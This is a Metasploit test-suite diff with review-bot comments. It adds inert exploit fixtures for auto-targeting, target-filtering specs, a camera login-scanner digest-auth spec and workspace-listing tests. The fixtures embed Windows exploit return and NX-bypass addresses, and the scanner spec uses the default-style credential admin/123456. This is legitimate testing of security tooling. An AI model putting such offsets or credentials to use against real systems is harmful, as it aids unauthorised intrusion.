+ super(update_info(info,
+ 'Name' => 'Exploit Auto-Targeting for Windows',
+ 'Description' => %q{ This module is a test bed for automatic targeting for Windows exploits. },
+ 'Author' => [ 'thelightcosine' ],
+ 'License' => MSF_LICENSE,
+ 'Privileged' => true,
+ 'DefaultOptions' =>
+ {
+ 'WfsDelay' => 10,
+ 'EXITFUNC' => 'thread'
+ },
+ 'Payload' =>
+ {
+ 'Space' => 3072,
+ 'DisableNops' => true
+ },
+ 'Platform' => 'win',
+ 'Arch' => [ARCH_X86, ARCH_X64],
+ 'Targets' =>
+ [
+ ['Windows 2000 Universal',
+ {
+ 'Ret' => 0x001f1cb0,
+ 'Scratch' => 0x00020408,
+ }
+ ], # JMP EDI SVCHOST.EXE
+
+ #
+ # Standard return-to-ESI without NX bypass
+ # Warning: DO NOT CHANGE THE OFFSET OF THIS TARGET
+ #
+ ['Windows XP SP0/SP1 Universal',
+ {
+ 'Ret' => 0x01001361,
+ 'Scratch' => 0x00020408,
+ }
+ ], # JMP ESI SVCHOST.EXE
+
+ # Standard return-to-ESI without NX bypass
+ ['Windows 2003 SP0 Universal',
+ {
+ 'Ret' => 0x0100129e,
+ 'Scratch' => 0x00020408,
+ }
+ ], # JMP ESI SVCHOST.EXE
+ # Metasploit's NX bypass for XP SP2/SP3
+ ['Windows XP SP3 English (NX)',
+ {
+ 'Ret' => 0x6f88f807,
+ 'DisableNX' => 0x6f8917c2,
+ 'Scratch' => 0x00020408
+ }
+ ]
+
+ ],
+ 'DisclosureDate' => 'Jan 01 1999'
+ ))
+
+ deregister_options('RPORT')
+ end
+
+ def exploit
+ print_status("This exploit doesn't actually do anything")
+ print_status "Target Selected: #{target.name}"
+ end
+
+
+end
\ No newline at end of file
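Review bot: `deregister_options('RPORT')` at the end of `initialize` appears only in this fixture and not in its three siblings, although all four `include Exploit::Remote::Tcp` in the same way. If the Windows fixture is meant to test how auto-targeting behaves without an RPORT option, say so with `# RPORT deregistered on purpose: exercises auto-targeting without a port` ; otherwise it looks like a copy-paste remnant and should be dropped for consistency. The `exploit` method also mixes `print_status(...)` and paren-less `print_status "..."` on adjacent lines; pick one form.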
diff --git a/spec/file_fixtures/modules/exploits/existing_auto_target.rb b/spec/file_fixtures/modules/exploits/existing_auto_target.rb
new file mode 100644
index 0000000000..53d23c4692
--- /dev/null
+++ b/spec/file_fixtures/modules/exploits/existing_auto_target.rb
@@ -0,0 +1,75 @@
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+ include Exploit::Remote::Tcp
+
+ Rank = ManualRanking
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Exploit With Existing Automatic Target',
+ 'Description' => %q{ This module is a test bed for automatic targeting when there is already an auto target. },
+ 'Author' => [ 'thelightcosine' ],
+ 'License' => MSF_LICENSE,
+ 'Privileged' => true,
+ 'DefaultOptions' =>
+ {
+ 'WfsDelay' => 10,
+ 'EXITFUNC' => 'thread'
+ },
+ 'Payload' =>
+ {
+ 'Space' => 3072,
+ 'DisableNops' => true
+ },
+ 'Platform' => 'win',
+ 'Arch' => [ARCH_X86, ARCH_X64],
+ 'Targets' =>
+ [
+ ['Automatic Targeting', { 'auto' => true }],
+ ['Windows 2000 Universal',
+ {
+ 'Ret' => 0x001f1cb0,
+ 'Scratch' => 0x00020408,
+ }
+ ], # JMP EDI SVCHOST.EXE
+
+ #
+ # Standard return-to-ESI without NX bypass
+ # Warning: DO NOT CHANGE THE OFFSET OF THIS TARGET
+ #
+ ['Windows XP SP0/SP1 Universal',
+ {
+ 'Ret' => 0x01001361,
+ 'Scratch' => 0x00020408,
+ }
+ ], # JMP ESI SVCHOST.EXE
+
+ # Standard return-to-ESI without NX bypass
+ ['Windows 2003 SP0 Universal',
+ {
+ 'Ret' => 0x0100129e,
+ 'Scratch' => 0x00020408,
+ }
+ ], # JMP ESI SVCHOST.EXE
+ # Metasploit's NX bypass for XP SP2/SP3
+ ['Windows XP SP3 English (NX)',
+ {
+ 'Ret' => 0x6f88f807,
+ 'DisableNX' => 0x6f8917c2,
+ 'Scratch' => 0x00020408
+ }
+ ]
+
+ ],
+ 'DisclosureDate' => 'Jan 01 1999'
+ ))
+ end
+
+ def exploit
+ print_status("This exploit doesn't actually do anything")
+
+ end
+
+
+end
\ No newline at end of file
diff --git a/spec/file_fixtures/modules/exploits/single_target_exploit.rb b/spec/file_fixtures/modules/exploits/single_target_exploit.rb
new file mode 100644
index 0000000000..fd5905a479
--- /dev/null
+++ b/spec/file_fixtures/modules/exploits/single_target_exploit.rb
@@ -0,0 +1,45 @@
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+ include Exploit::Remote::Tcp
+
+ Rank = ManualRanking
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Exploit With a Single Target',
+ 'Description' => %q{ This module is a test bed for automatic targeting when there is only one target. },
+ 'Author' => [ 'thelightcosine' ],
+ 'License' => MSF_LICENSE,
+ 'Privileged' => true,
+ 'DefaultOptions' =>
+ {
+ 'WfsDelay' => 10,
+ 'EXITFUNC' => 'thread'
+ },
+ 'Payload' =>
+ {
+ 'Space' => 3072,
+ 'DisableNops' => true
+ },
+ 'Platform' => 'win',
+ 'Arch' => [ARCH_X86, ARCH_X64],
+ 'Targets' =>
+ [
+ ['Windows 2000 Universal',
+ {
+ 'Ret' => 0x001f1cb0,
+ 'Scratch' => 0x00020408,
+ }
+ ], # JMP EDI SVCHOST.EXE
+ ],
+ 'DisclosureDate' => 'Jan 01 1999'
+ ))
+ end
+
+ def exploit
+ print_status("This exploit doesn't actually do anything")
+ end
+
+
+end
\ No newline at end of file
diff --git a/spec/lib/metasploit/framework/login_scanner/bavision_cameras_spec.rb b/spec/lib/metasploit/framework/login_scanner/bavision_cameras_spec.rb
new file mode 100644
index 0000000000..a3dcfc60a0
--- /dev/null
+++ b/spec/lib/metasploit/framework/login_scanner/bavision_cameras_spec.rb
@@ -0,0 +1,55 @@
+require 'metasploit/framework/login_scanner/bavision_cameras'
+
+RSpec.describe Metasploit::Framework::LoginScanner::BavisionCameras do
+
+ it_behaves_like 'Metasploit::Framework::LoginScanner::Base', has_realm_key: true, has_default_realm: false
+ it_behaves_like 'Metasploit::Framework::LoginScanner::RexSocket'
+
+ subject do
+ described_class.new
+ end
+
+ describe '#digest_auth' do
+ let(:username) { 'admin' }
+ let(:password) { '123456' }
+ let(:response) {
+ {
+ "www-authenticate" => "Digest realm=\"IPCamera Login\", nonce=\"918fee7e0b1126e4c2577911901a181b\", qop=\"auth\""
+ }
+ }
+
+ context 'when a credential is given' do
+ it 'returns a string with username' do
+ expect(subject.digest_auth(username, password, response)).to include('username=')
+ end
+
+ it 'returns a string with realm' do
+ expect(subject.digest_auth(username, password, response)).to include('realm=')
+ end
+
+ it 'returns a string with qop' do
+ expect(subject.digest_auth(username, password, response)).to include('qop=')
+ end
+
+ it 'returns a string with uri' do
+ expect(subject.digest_auth(username, password, response)).to include('uri=')
+ end
+
+ it 'returns a string with nonce' do
+ expect(subject.digest_auth(username, password, response)).to include('nonce=')
+ end
+
+ it 'returns a string with nonce count' do
+ expect(subject.digest_auth(username, password, response)).to include('nc=')
+ end
+
+ it 'returns a string with cnonce' do
+ expect(subject.digest_auth(username, password, response)).to include('cnonce=')
+ end
+
+ it 'returns a string with response' do
+ expect(subject.digest_auth(username, password, response)).to include('response=')
+ end
+ end
+ end
+end
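Review bot: The `'returns a string with nonce'` example cannot fail independently of the cnonce check, because `include('nonce=')` is satisfied by the substring of `cnonce=`; anchor it on the field boundary, e.g. `expect(subject.digest_auth(username, password, response)).to match(/(^|, )nonce="918fee7e0b1126e4c2577911901a181b"/)`. More broadly, every example only asserts that a field name is present, so a wrong HA1/HA2 construction or a mis-ordered `response` digest would still pass; if `digest_auth` picks its own cnonce and nc, stub or fix them in a `before` block so one example can pin the full `response=` value against a hand-computed vector for this realm/nonce/username/password. The returned string's `uri=` value is also never checked against what the scanner actually requests.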
diff --git a/spec/lib/msf/core/exploit/auto_target_spec.rb b/spec/lib/msf/core/exploit/auto_target_spec.rb
new file mode 100644
index 0000000000..65f680063e
--- /dev/null
+++ b/spec/lib/msf/core/exploit/auto_target_spec.rb
@@ -0,0 +1,185 @@
+require 'spec_helper'
+
+RSpec.describe Msf::Exploit::AutoTarget do
+
+ include_context 'Msf::DBManager'
+ include_context 'Metasploit::Framework::Spec::Constants cleaner'
+
+ let(:windows_exploit) {
+ framework.modules.add_module_path(File.join(FILE_FIXTURES_PATH, 'modules'))
+ framework.modules.create('exploit/auto_target_windows')
+ }
+
+ let(:linux_exploit){
+ framework.modules.add_module_path(File.join(FILE_FIXTURES_PATH, 'modules'))
+ framework.modules.create('exploit/auto_target_linux')
+ }
+
+ let(:auto_exploit){
+ framework.modules.add_module_path(File.join(FILE_FIXTURES_PATH, 'modules'))
+ framework.modules.create('exploit/existing_auto_target')
+ }
+
+ let(:single_exploit){
+ framework.modules.add_module_path(File.join(FILE_FIXTURES_PATH, 'modules'))
+ framework.modules.create('exploit/single_target_exploit')
+ }
+
+ context 'adding an Automatic target' do
+ context 'an exploit without an existing Automatic target' do
+
+ it 'should have an Automatic target added to the top of the list' do
+ first_target = windows_exploit.targets.first
+ expect(first_target.name).to eq 'Automatic'
+ end
+ end
+
+ context 'an exploit with an existing Automatic target' do
+ it 'should not add an extra Automatic Target' do
+ expect(auto_exploit.targets.count).to eq 5
+ end
+ end
+
+ context 'an exploit with only one target' do
+ it 'should not add an automatic target' do
+ expect(single_exploit.targets.count).to eq 1
+ end
+ end
+ end
+
+ describe '#auto_target?' do
+ it 'should return true if the automatic target is selected' do
+ host_addr = '192.168.1.5'
+ host_obj = FactoryGirl.create(:mdm_host, address: host_addr )
+ windows_exploit.datastore['TARGET'] = 0
+ windows_exploit.datastore['WORKSPACE'] = host_obj.workspace.name
+ windows_exploit.datastore['RHOST'] = host_addr
+ expect(windows_exploit.auto_target?).to be true
+ end
+
+ it 'should return false if the automatic target is not selected' do
+ windows_exploit.datastore['TARGET'] = 1
+ expect(windows_exploit.auto_target?).to be false
+ end
+
+ it 'should return false if the automatic target was added by the module authour' do
+ auto_exploit.datastore['TARGET'] = 0
+ expect(auto_exploit.auto_target?).to be false
+ end
+ end
+
+ context 'finding the target host' do
+ it 'should return a matching Mdm::host if there is one' do
+ host_addr = '192.168.1.5'
+ host_obj = FactoryGirl.create(:mdm_host, address: host_addr )
+ windows_exploit.datastore['WORKSPACE'] = host_obj.workspace.name
+ windows_exploit.datastore['RHOST'] = host_addr
+ expect(windows_exploit.auto_target_host).to eq host_obj
+ end
+
+ it 'should return nil if there is not one' do
+ windows_exploit.datastore['RHOST'] = '192.168.111.115'
+ expect(windows_exploit.auto_target_host).to be_nil
+ end
+ end
+
+ context 'filtering targets' do
+ let(:windows_xp_host) { FactoryGirl.create(:mdm_host, address: '192.168.172.150', os_family: 'Windows', os_name: 'Windows XP' ) }
+ let(:windows_xp_sp1_host) { FactoryGirl.create(:mdm_host, address: '192.168.172.150', os_family: 'Windows', os_name: 'Windows XP', os_sp: 'SP1' ) }
+ let(:windows_xp_sp2_host) { FactoryGirl.create(:mdm_host, address: '192.168.172.150', os_family: 'Windows', os_name: 'Windows XP', os_sp: 'SP2' ) }
+ let(:windows_xp_sp3_host) { FactoryGirl.create(:mdm_host, address: '192.168.172.150', os_family: 'Windows', os_name: 'Windows XP', os_sp: 'SP3' ) }
+ let(:windows_7_host) { FactoryGirl.create(:mdm_host, address: '192.168.172.150', os_family: 'Windows', os_name: 'Windows 7' ) }
+ let(:unknown_host) { FactoryGirl.create(:mdm_host, address: '192.168.172.150', os_family: nil ) }
+ let(:potential_targets) { windows_exploit.filter_by_os_family(windows_xp_host) }
+ let(:xp_targets) { windows_exploit.filter_by_os_name(potential_targets,windows_xp_host) }
+
+ context 'by OS family' do
+ it 'should return an array of all matching targets' do
+ expect(windows_exploit.filter_by_os_family(windows_xp_host).count).to eq 4
+ end
+
+ it 'should return an empty array if there are no matches' do
+ expect(linux_exploit.filter_by_os_family(windows_xp_host).count).to eq 0
+ end
+
+ it 'should return nil if the os is unkown on the host' do
+ expect(windows_exploit.filter_by_os_family(unknown_host).count).to eq 0
+ end
+ end
+
+ context 'by OS Name' do
+
+
+ it 'should return an array of matching targets when any exist' do
+ expect(windows_exploit.filter_by_os_name(potential_targets,windows_xp_host)).to eq [potential_targets[1],potential_targets[3]]
+ end
+
+ it 'should return an empty array if there are no matches' do
+ expect(windows_exploit.filter_by_os_name(potential_targets,windows_7_host)).to eq []
+ end
+
+ it 'should return an empty array when there is no OS name' do
+ expect(windows_exploit.filter_by_os_name(potential_targets,unknown_host)).to eq []
+ end
+ end
+
+ context 'by OS Version/Service Pack' do
+ it 'should return an array of matching results if they exist' do
+ expect(windows_exploit.filter_by_os_sp(potential_targets,windows_xp_sp1_host)).to eq [xp_targets[0]]
+ end
+
+ it 'should return an empty array if there are no matching results' do
+ expect(windows_exploit.filter_by_os_sp(potential_targets,windows_xp_sp2_host)).to eq []
+ end
+
+ it 'should return an empty array if there is no SP' do
+ expect(windows_exploit.filter_by_os_sp(potential_targets,unknown_host)).to eq []
+ end
+
+ end
+
+ context '#filter_by_os' do
+ it 'should return an array of matching targets' do
+ expect(windows_exploit.filter_by_os(windows_xp_sp1_host)).to eq [xp_targets[0]]
+ end
+
+ it 'should fall back to previous filter levels if a more strict filter did not return results' do
+ expect(windows_exploit.filter_by_os(windows_xp_host)).to eq xp_targets
+ end
+ end
+
+ context '#select_target' do
+ it 'should return the matching target on a precise match' do
+ windows_exploit.datastore['WORKSPACE'] = windows_xp_sp1_host.workspace.name
+ windows_exploit.datastore['RHOST'] = windows_xp_sp1_host.address
+ expect(windows_exploit.select_target).to eq xp_targets[0]
+ end
+
+ it 'should return the first match on a less precise match' do
+ windows_exploit.datastore['WORKSPACE'] = windows_xp_host.workspace.name
+ windows_exploit.datastore['RHOST'] = windows_xp_host.address
+ expect(windows_exploit.select_target).to eq xp_targets[0]
+ end
+ end
+
+ context '#auto_targeted_index' do
+ it 'should return the index of the selected target' do
+ windows_exploit.datastore['WORKSPACE'] = windows_xp_sp1_host.workspace.name
+ windows_exploit.datastore['RHOST'] = windows_xp_sp1_host.address
+ expect(windows_exploit.auto_targeted_index).to eq 2
+ end
+
+ it 'should return nil if it does not find a match' do
+ windows_exploit.datastore['WORKSPACE'] = unknown_host.workspace.name
+ windows_exploit.datastore['RHOST'] = unknown_host.address
+ expect(windows_exploit.auto_targeted_index).to eq nil
+ end
+ end
+
+ end
+
+
+
+
+
+end
\ No newline at end of file
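Review bot: The example titled 'should return nil if the os is unkown on the host' (in the 'by OS family' context) actually asserts `.count).to eq 0`, i.e. an empty array, so the title and the assertion disagree; rename it to `it 'should return an empty array if the os is unknown on the host' do` to match its sibling examples, and fix the 'unkown' and 'authour' typos while here. The four `let` blocks at the top each call `framework.modules.add_module_path(File.join(FILE_FIXTURES_PATH, 'modules'))`; a single `before { ... }` would avoid re-adding the path once per fixture. In 'filtering targets' every host `let` uses the address '192.168.172.150', so an example that realizes two of them (e.g. `#select_target` with `windows_xp_sp1_host` and `xp_targets`, which instantiates `windows_xp_host`) may create duplicate hosts — presumably in separate workspaces, but worth confirming that `select_target` resolves the intended one. The file also ends with four blank lines and no trailing newline.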
diff --git a/spec/lib/msf/ui/console/command_dispatcher/db_spec.rb b/spec/lib/msf/ui/console/command_dispatcher/db_spec.rb
index f1f9ad153e..4900729224 100644
--- a/spec/lib/msf/ui/console/command_dispatcher/db_spec.rb
+++ b/spec/lib/msf/ui/console/command_dispatcher/db_spec.rb
@@ -394,7 +394,7 @@ RSpec.describe Msf::Ui::Console::CommandDispatcher::Db do
" -n,--name Change the name of a host",
" -m,--comment Change the comment of a host",
" -t,--tag Add or specify a tag to a range of hosts",
- "Available columns: address, arch, comm, comments, created_at, cred_count, detected_arch, exploit_attempt_count, host_detail_count, info, mac, name, note_count, os_flavor, os_lang, os_name, os_sp, purpose, scope, service_count, state, updated_at, virtual_host, vuln_count, tags"
+ "Available columns: address, arch, comm, comments, created_at, cred_count, detected_arch, exploit_attempt_count, host_detail_count, info, mac, name, note_count, os_family, os_flavor, os_lang, os_name, os_sp, purpose, scope, service_count, state, updated_at, virtual_host, vuln_count, tags"
]
end
end
@@ -542,6 +542,7 @@ RSpec.describe Msf::Ui::Console::CommandDispatcher::Db do
db.cmd_workspace "-D"
@output = []
end
+
describe "" do
it "should list default workspace" do
db.cmd_workspace
@@ -561,6 +562,35 @@ RSpec.describe Msf::Ui::Console::CommandDispatcher::Db do
end
end
+ describe "-v" do
+ it "should list default workspace verbosely" do
+ db.cmd_workspace("-v")
+ expect(@output).to match_array [
+ "",
+ "Workspaces",
+ "==========",
+ "current name hosts services vulns creds loots notes",
+ "------- ---- ----- -------- ----- ----- ----- -----",
+ "* default 0 0 0 0 0 0"
+ ]
+ end
+
+ it "should list all workspaces verbosely" do
+ db.cmd_workspace("-a", "foo")
+ @output = []
+ db.cmd_workspace("-v")
+ expect(@output).to match_array [
+ "",
+ "Workspaces",
+ "==========",
+ "current name hosts services vulns creds loots notes",
+ "------- ---- ----- -------- ----- ----- ----- -----",
+ " default 0 0 0 0 0 0",
+ "* foo 0 0 0 0 0 0"
+ ]
+ end
+ end
+
describe "-a" do
it "should add workspaces" do
db.cmd_workspace("-a", "foo", "bar", "baf")
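Review bot: The two `-v` examples use `match_array`, which ignores element order, so the header, separator and data rows could be emitted in any order and still pass; since the verbose table's layout is the point of this change, `expect(@output).to eq [ ... ]` would pin it (the existing `-a` examples in this file also use `match_array`, so this may be a deliberate file-wide convention). The second example relies on `cmd_workspace("-a", "foo")` switching the current workspace, which the `* foo` row asserts only implicitly; a one-line comment such as `# adding a workspace also makes it the current one` above it would make the expectation explicit.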
@@ -603,6 +633,7 @@ RSpec.describe Msf::Ui::Console::CommandDispatcher::Db do
expect(@output).to match_array [
"Usage:",
" workspace List workspaces",
+ " workspace -v List workspaces verbosely",
" workspace [name] Switch workspace",
" workspace -a [name] ... Add workspace(s)",
" workspace -d [name] ... Delete workspace(s)",